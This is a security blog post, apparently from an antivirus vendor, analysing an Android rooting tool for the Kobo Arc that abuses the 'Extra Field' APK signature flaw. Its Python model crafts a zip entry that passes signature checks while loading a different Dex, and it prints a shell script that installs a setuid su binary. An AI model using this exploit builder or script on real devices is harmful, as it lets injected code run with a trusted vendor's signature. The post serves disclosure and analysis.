It has been 20 days since the Extra Field vulnerability (also known as Chinese Master Keys) was first reported (translated link) by the Android Security Squad. It has now been spotted in the wild.
The linked sample (MD5: C9F4C62521C04B8ADD796A1D5CEE08B0), which will be referred to as Arctic.apk, contains another APK named DoubleRainbow.apk (MD5: 1B14AD438375E6C25F645A855828D78F). DoubleRainbow.apk is the file that carries the Extra Field exploit. This APK is not malware; it is a tool designed to root the Kobo Arc tablet.
A Brief Overview
The Extra Field vulnerability exists because of a signed/unsigned mismatch between the code that verifies the cryptographic signature of an APK's files and the code that later loads them. An APK is a Zip file, and every file in a Zip has a local file header that contains, among other fields, a 16-bit Extra Field Length followed by the Extra Field itself (see the header structure here). When checking the signature of a file, the verifier reads the Extra Field Length as a signed short and adds it to its offset in order to jump over the Extra Field to the file's bytes. With the length set to 0xFFFD the signed value is -3, so the verifier jumps 3 bytes backward, into the file name. For classes.dex the last three bytes of the name, "dex", are also the first three bytes of the Dex magic ("dex\n035\0"), so the verifier hashes "dex" followed by whatever the Extra Field contains. The loader reads the same length correctly, as an unsigned short (65533), and jumps forward over the Extra Field to the file data; for that jump to land on the data, the Extra Field really must be 65533 bytes long. If the original Dex file, minus its first three bytes, is placed at the start of the Extra Field, the verifier hashes exactly the original file and the signature check passes. A different Dex file of the same size can then be placed where the file data belongs. The loader reads that injected (likely malicious) Dex and runs it, without breaking the APK's signature.
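To make the offset arithmetic concrete, here is an added example that is not code from the original post or from the sample's author. It models the Zip local file header in Python, builds a stored classes.dex entry laid out the way the sample is, and then parses it twice: once as the buggy verifier would (Extra Field Length as a signed short) and once as the loader would (unsigned). The Dex contents, the single SHA-1 digest comparison standing in for the MANIFEST.MF check, and the names build_local_entry, entry_data, craft_exploit_entry and manifest_digest_ok are all constructed for illustration; a real APK verifier works through the JAR signature files and base64 digests, which the model collapses to one hash comparison.

```python
import hashlib
import struct
import zlib

LOCAL_SIG = 0x04034B50
LOCAL_FMT = "<IHHHHHIIIHH"        # PKWARE local file header: 30 bytes, little-endian
LOCAL_LEN = struct.calcsize(LOCAL_FMT)
DEX_MAGIC = b"dex\n035\x00"       # real Dex magic; its first 3 bytes equal the tail of "classes.dex"

# Constructed stand-ins for the two classes.dex files (not real Dex bytecode).
ORIGINAL_DEX = DEX_MAGIC + b"ORIGINAL KOBO STATUS BAR CODE " * 40
INJECTED_BODY = b"HYPOTHETICAL CODE THAT EXECS wifiScript.sh"


def build_local_entry(name, extra, data, extra_len_field=None):
    """Header + name + Extra Field + data for one STORED (method 0) entry.
    extra_len_field lets the caller write a length that is not len(extra),
    which is how the crafted entry gets 0xFFFD on the wire."""
    if extra_len_field is None:
        extra_len_field = len(extra)
    header = struct.pack(
        LOCAL_FMT, LOCAL_SIG,
        20,                             # version needed to extract
        0, 0,                           # general purpose flags, method 0 = stored
        0, 0,                           # last mod time / date
        zlib.crc32(data) & 0xFFFFFFFF,
        len(data), len(data),           # compressed and uncompressed size
        len(name), extra_len_field,
    )
    return header + name + extra + data


def entry_data(entry, signed_extra):
    """Bytes a parser takes to be the file's contents.
    signed_extra=True reproduces the verifier's bug: 0xFFFD read as a
    16-bit signed short is -3, so the data offset moves 3 bytes backwards
    into the file name. False is the loader's correct unsigned read."""
    (sig, _ver, _flags, method, _time, _date, _crc,
     csize, _usize, name_len, extra_len) = struct.unpack_from(LOCAL_FMT, entry, 0)
    if sig != LOCAL_SIG or method != 0:
        raise ValueError("not a stored local file entry")
    if signed_extra and extra_len & 0x8000:
        extra_len -= 0x10000            # sign-extend: 0xFFFD -> -3
    off = LOCAL_LEN + name_len + extra_len
    return entry[off:off + csize]


def craft_exploit_entry(original_dex, injected_body):
    """Hide original_dex in the Extra Field and put an injected Dex of the
    same size where the file data belongs."""
    if not original_dex.startswith(DEX_MAGIC) or len(original_dex) > 0x10000:
        raise ValueError("original must be a Dex of at most 64 KiB for this layout")
    # The verifier starts 3 bytes early, on the "dex" that ends the file
    # name, so the Extra Field holds the original minus those 3 bytes.
    # The loader adds 0xFFFD (65533) to the offset, so the Extra Field
    # must be exactly that long for its read to land on the injected data.
    extra = original_dex[3:].ljust(0xFFFD, b"\x00")
    injected = DEX_MAGIC + injected_body
    if len(injected) > len(original_dex):
        raise ValueError("injected Dex must not be larger than the original")
    pad_len = len(original_dex) - len(injected)
    injected += (b"LOLO" * pad_len)[:pad_len]     # size padding, as in the sample
    return build_local_entry(b"classes.dex", extra, injected, extra_len_field=0xFFFD)


def manifest_digest_ok(entry, expected_sha1_hex):
    """What the signature check effectively does for one entry: hash the
    bytes it believes are the file and compare with the recorded digest."""
    seen = entry_data(entry, signed_extra=True)
    return hashlib.sha1(seen).hexdigest() == expected_sha1_hex


def demo():
    """Build the crafted entry and report what each parser sees."""
    entry = craft_exploit_entry(ORIGINAL_DEX, INJECTED_BODY)
    expected = hashlib.sha1(ORIGINAL_DEX).hexdigest()
    loaded = entry_data(entry, signed_extra=False)
    return {
        "signature_check_passes": manifest_digest_ok(entry, expected),
        "loader_gets_original": loaded == ORIGINAL_DEX,
        "loader_gets_dex_magic": loaded.startswith(DEX_MAGIC),
        "loader_gets_padding": b"LOLOLOL" in loaded,
        "sizes_equal": len(loaded) == len(ORIGINAL_DEX),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The crafted entry passes the digest check yet hands the loader a completely different file of the same size, which is the whole bug. Parsing the length the loader's way (unsigned) inside the verifier makes both sides see the same bytes, and a benign entry with an empty Extra Field parses identically under either rule.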
The Sample
Checking the files inside of Arctic.apk, it is fairly obvious that it is up to something. Inside the /assets/ folder we see the following files:
DoubleRainbow.apk
su
Superuser.apk
wifiScript.sh
The presence of Superuser.apk indicates that Arctic will likely be rooting the device. Arctic is fairly simple: it installs and runs DoubleRainbow.apk, which was originally a system package for the Kobo Status Bar. Because it is a system package, it is granted elevated privileges on the device. The Extra Field exploit allowed the author to inject custom code that runs as this package. Because the loader and the verifier both take the file size from the same header fields, the injected Dex has to be exactly as large as the classes.dex it replaces, so it was padded out with a 2599 byte "LOLOLOL..." string. Once executed, the custom classes.dex runs wifiScript.sh, the contents of which can be seen here:
#!/system/bin/sh
mount -o rw,remount /system
cat /data/data/com.android.innocomm.EngineerMode/su >/system/xbin/su
chmod 6755 /system/xbin/su
cat /data/data/com.android.innocomm.EngineerMode/Superuser.apk >/system/app/Superuser.apk
chmod 644 /system/app/Superuser.apk
pm uninstall com.kobo.statusbar
Since DoubleRainbow.apk is already running with the system package's privileges, all the script needs to do is remount /system read-write, copy su and Superuser.apk into place (mode 6755 sets the setuid and setgid bits on su), and then uninstall the original status bar package.
Conclusion
The APK was authored by @zhuowei and can be found on their GitHub. None of the source code was being returned by Google, since it had been posted so recently; the repository was found through the author's name on Arctic.apk's certificate. As the two certificates below show, Arctic.apk is signed by the author, while the Kobo Status Bar APK (DoubleRainbow.apk) still carries the certificate issued by Jason Gamblen from Kobo Inc. That intact Kobo signature is exactly what lets the injected code run as the system package.
Arctic.apk - Issuer: C=CA, ST=British Columbia, L=Vancouver, O=Unknown, OU=Unknown, CN=Zhuowei Zhang
DoubleRainbow.apk - Issuer: C=CA, ST=Ontario, L=Toronto, O=Kobo, OU=Android Team, CN=Android/emailAddress=jgamblen@kobobooks.com
While this APK is not malicious, it demonstrates how easy it is to gain root access using the Extra Field vulnerability. It is expected that this vulnerability and the Master Keys vulnerability will become common in Android malware.
I have downloaded Arctic.apk on my Kobo Arc (Android JB 4.1.2) in order to get root privileges. During installation I was alerted about a trojan virus, so I aborted the installation. Now I read in your post that the apk file is safe even though VirusTotal detects a lot of menaces. Will you confirm that Arctic.apk is NOT a malicious file? Thanks. Alessandro